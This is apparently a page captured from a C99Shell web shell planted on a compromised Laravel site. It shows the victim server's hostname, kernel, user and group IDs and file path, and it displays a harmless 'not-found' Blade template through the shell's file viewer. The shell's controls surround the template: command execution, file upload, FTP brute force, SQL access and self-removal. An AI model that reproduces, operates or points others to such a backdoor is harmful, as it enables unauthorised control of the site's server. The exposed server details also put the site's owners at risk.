!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/classify.picotech.app/public_html/resources/views/components/admin/   drwxr-xr-x
Free 29.37 GB of 117.98 GB (24.9%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     not-found.blade.php (2.57 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
@php
$singuler = Str::plural($word, 1);
$plural = Str::plural($word, 2);
$method = Str::upper($method);
@endphp
@if ($method == 'GET')
    <div class="empty py-5">
        <div class="empty-img">
            <img src="{{ asset('backend/image') }}/not-found.svg" height="128" alt="">
        </div>
        <h5 class="mt-4">{{ __('no_results_found') }}</h5>
        <p class="empty-subtitle text-muted">
            {{ __('there_is_no') }} {{ __(strtolower($plural)) }} {{ __('found_in_this_page') }}
        </p>
        <div class="empty-action">
            @if ($route !== '')
                <a href="{{ route($route) }}" class="btn btn-primary">
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon" width="24" height="24"
                        viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round"
                        stroke-linejoin="round">
                        <path stroke="none" d="M0 0h24v24H0z" fill="none"></path>
                        <line x1="12" y1="5" x2="12" y2="19"></line>
                        <line x1="5" y1="12" x2="19" y2="12"></line>
                    </svg>
                    {{ __('add_your_first') }} {{ strtolower($singuler) }}
                </a>
            @endif
        </div>
    </div>
@else
    <div class="empty py-5">
        <div class="empty-img">
            <img src="{{ asset('backend/image') }}/not-found.svg" height="128" alt="">
        </div>
        <h5 class="mt-4">{{ __('no_results_found') }}</h5>
        <p class="empty-subtitle text-muted">
            {{ __('there_is_no') }} {{ strtolower($plural) }} {{ __('found_in_this_page') }}
        </p>
        <div class="empty-action">
            @if ($route !== '')
                <form action="{{ route($route) }}" method="POST">
                    @csrf
                    <button class="btn btn-primary" type="submit">
                        <svg xmlns="http://www.w3.org/2000/svg" class="icon" width="24" height="24"
                            viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none"
                            stroke-linecap="round" stroke-linejoin="round">
                            <path stroke="none" d="M0 0h24v24H0z" fill="none"></path>
                            <line x1="12" y1="5" x2="12" y2="19"></line>
                            <line x1="5" y1="12" x2="19" y2="12"></line>
                        </svg>
                        {{ __('add_your_first') }} {{ strtolower($singuler) }}
                    </button>
                </form>
            @endif
        </div>
    </div>
@endif

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0031 ]--